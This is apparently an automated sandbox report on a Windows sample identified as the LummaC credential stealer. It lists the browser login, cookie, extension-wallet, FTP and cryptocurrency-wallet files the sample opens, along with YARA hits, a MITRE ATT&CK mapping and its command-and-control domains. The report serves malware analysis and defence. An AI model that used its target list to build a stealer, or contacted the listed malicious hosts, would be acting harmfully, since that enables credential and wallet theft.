Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ			Jump to behavior

Source: Yara match	File source: 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183284410.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2155738862.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2184825039.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183365042.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183995653.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183909532.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2184609958.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183070027.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2184342033.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2120532040.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2182875665.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2184473776.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2156261014.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183708520.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2184119723.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2184213865.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183174320.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183492043.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2184688562.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2183790933.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2876, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 2876, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	34 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	761 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	34 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	39%	ReversingLabs	Win32.Trojan.Symmi
file.exe	100%	Avira	TR/Crypt.XPACK.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://atten-supporse.bz/	0%	Avira URL Cloud	safe
https://atten-supporse.biz:443/api://%ProgramFiles%	100%	Avira URL Cloud	malware
https://atten-supporse.biz/744-1-2	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api1	100%	Avira URL Cloud	malware
https://atten-supporse.biz:443/apiUU2	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
atten-supporse.biz	104.21.48.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
dare-curbys.biz	false	high
impend-differ.biz	false	high
covery-mover.biz	false	high
https://atten-supporse.biz/api	false	high
dwell-exclaim.biz	false	high
zinc-sneark.biz	false	high
formy-spill.biz	false	high
atten-supporse.biz	false	high
se-blurry.biz	false	high
print-vexer.biz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz:443/apiUU2	file.exe, 00000000.00000003.2206119101.0000000001746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205795166.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.bz/	file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270461946.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271651117.0000000001759000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://atten-supporse.biz/744-1-2	file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155726723.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156002703.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
